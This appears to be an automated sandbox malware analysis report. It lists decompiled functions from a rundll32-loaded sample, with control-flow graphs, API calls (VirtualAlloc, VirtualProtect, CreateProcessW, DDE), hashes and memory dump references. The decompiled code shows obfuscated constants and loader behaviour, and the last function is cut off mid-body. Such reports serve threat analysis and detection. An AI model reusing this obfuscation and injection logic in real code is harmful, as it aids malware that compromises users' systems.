                                                                      control_flow_graph 173 1ff6417-1ff66c4 call 2002550 call 1ff5755 call 200b86e 179 1ff66c9-1ff66ce 173->179 180 1ff670d 179->180 181 1ff66d0-1ff66d2 179->181 184 1ff670f-1ff6715 180->184 182 1ff66d4-1ff66da 181->182 183 1ff66e0-1ff670b call 1fff1ed * 2 181->183 185 1ff66db-1ff66de 182->185 183->185 185->184
                                                                      C-Code - Quality: 22%
                                                                      			E01FF6417(void* __edx, void* __eflags) {
				void* _t197;
				void* _t213;
				void* _t214;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				intOrPtr _t234;
				intOrPtr _t237;
				void* _t240;
				void* _t241;

				_t240 = _t241 - 0x58;
				_push( *((intOrPtr*)(_t240 + 0x7c)));
				_t234 =  *((intOrPtr*)(_t240 + 0x60));
				_push( *((intOrPtr*)(_t240 + 0x78)));
				_push( *((intOrPtr*)(_t240 + 0x74)));
				_push( *((intOrPtr*)(_t240 + 0x70)));
				_push( *((intOrPtr*)(_t240 + 0x6c)));
				_push( *((intOrPtr*)(_t240 + 0x68)));
				_push( *((intOrPtr*)(_t240 + 0x64)));
				_push(_t234);
				_push(__edx);
				_push(0);
				E02002550(_t197);
				 *(_t240 + 0x2c) = 0x767b;
				_t218 = 0x49;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) * 0x7f;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) / _t218;
				 *(_t240 + 0x2c) =  *(_t240 + 0x2c) ^ 0x0000f87c;
				 *(_t240 + 0x4c) = 0xef21;
				_t219 = 0x58;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) * 0x51;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) << 7;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) ^ 0xa17ee643;
				 *(_t240 + 0x4c) =  *(_t240 + 0x4c) ^ 0x84aa5f32;
				 *(_t240 + 0x34) = 0x6d8e;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) | 0x6849a982;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) + 0xc220;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) + 0xffff3440;
				 *(_t240 + 0x34) =  *(_t240 + 0x34) ^ 0x6849f13e;
				 *(_t240 + 0x1c) = 0xa45f;
				 *(_t240 + 0x1c) =  *(_t240 + 0x1c) ^ 0x8ac4df42;
				 *(_t240 + 0x1c) =  *(_t240 + 0x1c) ^ 0x8ac417ac;
				 *(_t240 + 0x48) = 0x404a;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) >> 0xa;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) / _t219;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) + 0xffff6f8b;
				 *(_t240 + 0x48) =  *(_t240 + 0x48) ^ 0xffff405a;
				 *(_t240 + 0x50) = 0x54f1;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) << 0xb;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) + 0x3a90;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) << 9;
				 *(_t240 + 0x50) =  *(_t240 + 0x50) ^ 0x4f85421e;
				 *(_t240 + 0x54) = 0x8597;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) << 8;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) | 0xa9f146ed;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) >> 5;
				 *(_t240 + 0x54) =  *(_t240 + 0x54) ^ 0x054fb0bb;
				 *(_t240 + 0x44) = 0x73dc;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) * 0x3b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) + 0xa50b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) ^ 0x812a8e6b;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) ^ 0x8131b455;
				 *(_t240 + 0x14) = 0x8d69;
				 *(_t240 + 0x14) =  *(_t240 + 0x14) << 1;
				 *(_t240 + 0x14) =  *(_t240 + 0x14) ^ 0x00015647;
				 *(_t240 + 8) = 0x519d;
				 *(_t240 + 8) =  *(_t240 + 8) ^ 0xf9151e6a;
				 *(_t240 + 8) =  *(_t240 + 8) ^ 0xf9150c68;
				 *(_t240 + 0x3c) = 0xc74b;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) | 0x7e9d0cc5;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) + 0xffff6740;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) + 0x85e7;
				 *(_t240 + 0x3c) =  *(_t240 + 0x3c) ^ 0x7e9dd5d0;
				 *(_t240 + 0x24) = 0x7835;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) + 0x26c5;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) >> 0x10;
				 *(_t240 + 0x24) =  *(_t240 + 0x24) ^ 0x00005957;
				 *(_t240 + 0x30) = 0xbe83;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) | 0xb98edffe;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) << 8;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) + 0xffff95b5;
				 *(_t240 + 0x30) =  *(_t240 + 0x30) ^ 0x8efff2e6;
				 *(_t240 + 0x38) = 0x2bdc;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) + 0xdf33;
				_t237 = 0x44;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) * 0x50;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) << 7;
				 *(_t240 + 0x38) =  *(_t240 + 0x38) ^ 0x29ba000b;
				 *(_t240 + 0xc) = 0x57cb;
				 *(_t240 + 0xc) =  *(_t240 + 0xc) + 0x1cd9;
				 *(_t240 + 0xc) =  *(_t240 + 0xc) ^ 0x00006426;
				 *(_t240 + 0x40) = 0x6f55;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) | 0x563c3ba0;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) << 0xd;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) + 0xfffff8ef;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) ^ 0x8ffe8da5;
				 *(_t240 + 0x20) = 0x40d0;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) * 0x75;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) ^ 0x609dd8a9;
				 *(_t240 + 0x20) =  *(_t240 + 0x20) ^ 0x608076c4;
				 *(_t240 + 0x28) = 0x4853;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) ^ 0x8def0e3c;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) << 2;
				 *(_t240 + 0x28) =  *(_t240 + 0x28) ^ 0x37bd1438;
				 *(_t240 + 0x10) = 0x42ee;
				 *(_t240 + 0x10) =  *(_t240 + 0x10) * 0x60;
				 *(_t240 + 0x10) =  *(_t240 + 0x10) ^ 0x00197620;
				 *(_t240 + 0x18) = 0x469;
				 *(_t240 + 0x18) =  *(_t240 + 0x18) * 0x15;
				 *(_t240 + 0x18) =  *(_t240 + 0x18) ^ 0x00003a34;
				_t220 =  *(_t240 + 0x2c);
				E01FF5755(_t220, _t240 - 0x4c,  *(_t240 + 0x4c),  *(_t240 + 0x34), _t237);
				 *((intOrPtr*)(_t240 - 0x4c)) = _t237;
				_push( *(_t240 + 0x24));
				_push(_t220);
				_push(_t240 - 0x4c);
				_push( *(_t240 + 0x3c));
				_push( *((intOrPtr*)(_t240 + 0x64)));
				_push( *(_t240 + 8));
				_push( *(_t240 + 0x14));
				_push(_t240 - 8);
				_push( *((intOrPtr*)(_t240 + 0x78)));
				_push(_t220);
				_push( *(_t240 + 0x44));
				_push( *(_t240 + 0x54));
				_push( *(_t240 + 0x50));
				_push( *(_t240 + 0x48));
				_t213 = E0200B86E( *((intOrPtr*)(_t240 + 0x7c)),  *(_t240 + 0x1c)); // executed
				if(_t213 == 0) {
					_t214 = 0;
				} else {
					if(_t234 == 0) {
						E01FFF1ED( *(_t240 + 0x30),  *(_t240 + 0x38),  *(_t240 + 0xc),  *(_t240 + 0x40),  *((intOrPtr*)(_t240 - 8)));
						E01FFF1ED( *(_t240 + 0x20),  *(_t240 + 0x28),  *(_t240 + 0x10),  *(_t240 + 0x18),  *((intOrPtr*)(_t240 - 4)));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t214 = 1;
				}
				return _t214;
			}













                                                                      0x01ff6418
                                                                      0x01ff6424
                                                                      0x01ff6427
                                                                      0x01ff642a
                                                                      0x01ff642d
                                                                      0x01ff6430
                                                                      0x01ff6433
                                                                      0x01ff6436
                                                                      0x01ff6439
                                                                      0x01ff643c
                                                                      0x01ff643d
                                                                      0x01ff643e
                                                                      0x01ff6440
                                                                      0x01ff6445
                                                                      0x01ff6454
                                                                      0x01ff6457
                                                                      0x01ff6461
                                                                      0x01ff6464
                                                                      0x01ff646b
                                                                      0x01ff6476
                                                                      0x01ff6477
                                                                      0x01ff647a
                                                                      0x01ff647e
                                                                      0x01ff6485
                                                                      0x01ff648c
                                                                      0x01ff6493
                                                                      0x01ff649a
                                                                      0x01ff64a1
                                                                      0x01ff64a8
                                                                      0x01ff64af
                                                                      0x01ff64b6
                                                                      0x01ff64bd
                                                                      0x01ff64c4
                                                                      0x01ff64cb
                                                                      0x01ff64d4
                                                                      0x01ff64d7
                                                                      0x01ff64de
                                                                      0x01ff64e5
                                                                      0x01ff64ec
                                                                      0x01ff64f0
                                                                      0x01ff64f7
                                                                      0x01ff64fb
                                                                      0x01ff6502
                                                                      0x01ff6509
                                                                      0x01ff650d
                                                                      0x01ff6514
                                                                      0x01ff6518
                                                                      0x01ff651f
                                                                      0x01ff652a
                                                                      0x01ff652d
                                                                      0x01ff6534
                                                                      0x01ff653b
                                                                      0x01ff6542
                                                                      0x01ff6549
                                                                      0x01ff654c
                                                                      0x01ff6553
                                                                      0x01ff655a
                                                                      0x01ff6561
                                                                      0x01ff6568
                                                                      0x01ff656f
                                                                      0x01ff6576
                                                                      0x01ff657d
                                                                      0x01ff6584
                                                                      0x01ff658b
                                                                      0x01ff6592
                                                                      0x01ff6599
                                                                      0x01ff659d
                                                                      0x01ff65a4
                                                                      0x01ff65ab
                                                                      0x01ff65b2
                                                                      0x01ff65b9
                                                                      0x01ff65c0
                                                                      0x01ff65c7
                                                                      0x01ff65ce
                                                                      0x01ff65db
                                                                      0x01ff65dd
                                                                      0x01ff65e0
                                                                      0x01ff65e4
                                                                      0x01ff65eb
                                                                      0x01ff65f2
                                                                      0x01ff65f9
                                                                      0x01ff6600
                                                                      0x01ff6607
                                                                      0x01ff660e
                                                                      0x01ff6612
                                                                      0x01ff6619
                                                                      0x01ff6620
                                                                      0x01ff662b
                                                                      0x01ff662e
                                                                      0x01ff6635
                                                                      0x01ff663c
                                                                      0x01ff6643
                                                                      0x01ff664a
                                                                      0x01ff664e
                                                                      0x01ff6655
                                                                      0x01ff6660
                                                                      0x01ff6663
                                                                      0x01ff666a
                                                                      0x01ff6675
                                                                      0x01ff6678
                                                                      0x01ff6685
                                                                      0x01ff6688
                                                                      0x01ff6690
                                                                      0x01ff6696
                                                                      0x01ff6699
                                                                      0x01ff669a
                                                                      0x01ff669b
                                                                      0x01ff66a1
                                                                      0x01ff66a4
                                                                      0x01ff66a7
                                                                      0x01ff66aa
                                                                      0x01ff66ae
                                                                      0x01ff66b1
                                                                      0x01ff66b2
                                                                      0x01ff66b8
                                                                      0x01ff66bb
                                                                      0x01ff66be
                                                                      0x01ff66c4
                                                                      0x01ff66ce
                                                                      0x01ff670d
                                                                      0x01ff66d0
                                                                      0x01ff66d2
                                                                      0x01ff66ef
                                                                      0x01ff6703
                                                                      0x01ff66d4
                                                                      0x01ff66d7
                                                                      0x01ff66d8
                                                                      0x01ff66d9
                                                                      0x01ff66da
                                                                      0x01ff66da
                                                                      0x01ff66dd
                                                                      0x01ff66dd
                                                                      0x01ff6715

                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 1bb1d0a9ce0f6d895f827a8d88b19ef494e72e3d5b923de3fddf5965c7bef492
                                                                      • Instruction ID: d1814a6c4b320e6c0e7a25e209e4dc5e59fbc0f5d2a923c4a9e9138ff8818479
                                                                      • Opcode Fuzzy Hash: 1bb1d0a9ce0f6d895f827a8d88b19ef494e72e3d5b923de3fddf5965c7bef492
                                                                      • Instruction Fuzzy Hash: BB91F072400649EBDF59CF64C9898CE3FA1FF44358F509218FE2A961A0D7B6C999CF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020004C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 46 20004c7-2000565 call 1ff7378 ExitProcess
                                                                      C-Code - Quality: 100%
                                                                      			E020004C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E01FF7378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}









                                                                      0x020004cd
                                                                      0x020004d6
                                                                      0x020004dd
                                                                      0x020004e1
                                                                      0x020004e5
                                                                      0x020004ec
                                                                      0x020004f8
                                                                      0x020004fd
                                                                      0x02000502
                                                                      0x02000509
                                                                      0x02000510
                                                                      0x02000517
                                                                      0x0200051f
                                                                      0x02000522
                                                                      0x02000529
                                                                      0x02000530
                                                                      0x02000537
                                                                      0x02000556
                                                                      0x02000560

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 02000560
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID: *S$5l$LZ
                                                                      • API String ID: 621844428-1939029103
                                                                      • Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction ID: e4b262c159388f6696a489feb567fc720f0a78e978fad19ceec5f864b40ac6b0
                                                                      • Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
                                                                      • Instruction Fuzzy Hash: 6811F771E0520CEBEB04DFE4D84AA9EBBB1EB50714F10C189E514A7294D7F96B548F41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02053928, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136filememoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 49 2053928-20539b4 call 20379dc 54 20539b6 49->54 55 20539bd-20539cf GetEnhMetaFileA 49->55 54->55 57 20539d1 55->57 58 20539d8-20539ec 55->58 57->58 59 2053a0e-2053ac5 VirtualAlloc 58->59 60 20539ee-2053a0c 58->60 68 2053acf-2053ada 59->68 60->59 69 2053b21-2053b33 68->69 70 2053adc-2053b1f 68->70 71 2053b75-2053bac 69->71 72 2053b35-2053b73 69->72 70->68 72->71 72->72
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 020539C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,02056CB4,00001000,00000040), ref: 02053A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345
                                                                      • API String ID: 2643768156-4105825235
                                                                      • Opcode ID: 4d3adc2f1cf1f0834a7b93784baba7307adb10a6bef81e2ff702f728e04ea475
                                                                      • Instruction ID: ca6d67a1d76c8353d868f86cc8b08fb5941d57e10ecd5c53ea0ca605c84c39e7
                                                                      • Opcode Fuzzy Hash: 4d3adc2f1cf1f0834a7b93784baba7307adb10a6bef81e2ff702f728e04ea475
                                                                      • Instruction Fuzzy Hash: D9619570E853259FE780DF68E586A273FA9FB04354BC08959E5098B260DF7BA864DF04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02051638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 74 2051638-2051641 75 2051643 74->75 76 205164b-20516d1 DdeInitializeA call 2051328 call 2051a14 74->76 75->76 86 20516d6-20516eb 76->86
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 02051686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: bfdc67b36e9c4c0ef12b445dcb8fc8790d10a4a4e7b7a1c4cd18bcd2b9ce1714
                                                                      • Instruction ID: 102dd1c3f1f4a56211691c16e4c62dda2d5b53e1e265d8b3ef48693c814b44d7
                                                                      • Opcode Fuzzy Hash: bfdc67b36e9c4c0ef12b445dcb8fc8790d10a4a4e7b7a1c4cd18bcd2b9ce1714
                                                                      • Instruction Fuzzy Hash: 7A119E70600B11AFE721EB75CD81B4FB7E5EF55700F901828E905DBB60EABAB901AB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024EB40, Relevance: 3.3, APIs: 2, Instructions: 252memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 88 24eb40-24eb93 VirtualProtect 89 24eb95-24eba1 88->89 90 24eba6-24ec17 88->90 91 24ec3a-24ec85 call 24e7a0 call 24e7e0 89->91 90->91 108 24ec19-24ec37 90->108 99 24ec90-24ec9a 91->99 100 24ec9c-24eca3 99->100 101 24ecf8-24ed4a call 24e920 99->101 102 24eca5-24ecac 100->102 103 24eced-24ecf6 100->103 111 24ed4c-24ed50 101->111 112 24ed78-24ed7f 101->112 102->103 106 24ecae-24ecea call 24e7e0 102->106 103->99 106->103 108->91 111->112 115 24ed52-24ed75 call 24e880 111->115 116 24ed8a-24ed94 112->116 115->112 117 24ede6-24ee1b call 24f000 116->117 118 24ed96-24ed9d 116->118 120 24ed9f-24eda6 118->120 121 24eddb-24ede4 118->121 120->121 124 24eda8-24edd9 call 24ee20 VirtualProtect 120->124 121->116 124->121
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0024EB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0024EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 9108f3255905e2c50fbceff6d599a8fbb1b566fd0b6e7b660debe7efaf51f06c
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 23C1C8B4A10209DFDB48CF88C590EAEB7B6BF88304F158159E819AB351D735EE52CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02051A14, Relevance: 3.1, APIs: 2, Instructions: 56serviceCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 2051a14-2051a5a call 2051ac8 135 2051a70-2051aa7 DdeCreateStringHandleA DdeNameService 129->135 136 2051a5c-2051a69 129->136 139 2051aaf 135->139 136->135
                                                                      APIs
                                                                        • Part of subcall function 02051AC8: DdeFreeStringHandle.USER32(?,?), ref: 02051AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 02051A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 02051A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088761508.0000000002013000.00000020.00020000.sdmp, Offset: 02013000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_2013000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 48bd3f3e65ea61ee71d3cec3b1eb1da49123c928072fc80cbfbc101b0d5bb205
                                                                      • Instruction ID: b151ea0f558b62dc6bad685f41c6d064b33f40c121761eab6ec87d08343984d6
                                                                      • Opcode Fuzzy Hash: 48bd3f3e65ea61ee71d3cec3b1eb1da49123c928072fc80cbfbc101b0d5bb205
                                                                      • Instruction Fuzzy Hash: 34118E31710325ABDB12EFA4CC80A5F77EDEF09B00B4005A4FE04EB255D6B1ED0097A4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF7F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 140 1ff7f4b-1ff7ffd call 2002550 call 1ff7378 lstrcmpiW
                                                                      C-Code - Quality: 80%
                                                                      			E01FF7F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E02002550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E01FF7378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}













                                                                      0x01ff7f52
                                                                      0x01ff7f55
                                                                      0x01ff7f57
                                                                      0x01ff7f5a
                                                                      0x01ff7f5e
                                                                      0x01ff7f5f
                                                                      0x01ff7f64
                                                                      0x01ff7f6b
                                                                      0x01ff7f72
                                                                      0x01ff7f79
                                                                      0x01ff7f94
                                                                      0x01ff7f97
                                                                      0x01ff7f9e
                                                                      0x01ff7fa5
                                                                      0x01ff7fac
                                                                      0x01ff7fb3
                                                                      0x01ff7fba
                                                                      0x01ff7fbe
                                                                      0x01ff7fc5
                                                                      0x01ff7fcc
                                                                      0x01ff7fd3
                                                                      0x01ff7fd7
                                                                      0x01ff7feb
                                                                      0x01ff7ff7
                                                                      0x01ff7ffd

                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 01FF7FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: 95dc4129b8c9b7350b193ba354ecb56fd3d1da8b3ad54597fa8731147189f0d9
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: 5B11DFB6C01219BBEF01EFA4C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 145 24e620-24e66b call 24ea10 148 24e66d-24e677 call 24ea10 145->148 149 24e67a-24e6aa call 24e390 VirtualAlloc 145->149 148->149
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0024E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: 94eaf2dbce76cd2387fc3ea58d4fa8236348bd978d5e8a14bd27de2a49caafab
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 0E111260D082C9DEFF01DBE894097FFBFB56F21704F044098D5456B282D6BA57588BB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200B86E, Relevance: 1.6, APIs: 1, Instructions: 74processCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 155 200b86e-200b949 call 2002550 call 1ff7378 CreateProcessW
                                                                      C-Code - Quality: 40%
                                                                      			E0200B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E02002550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
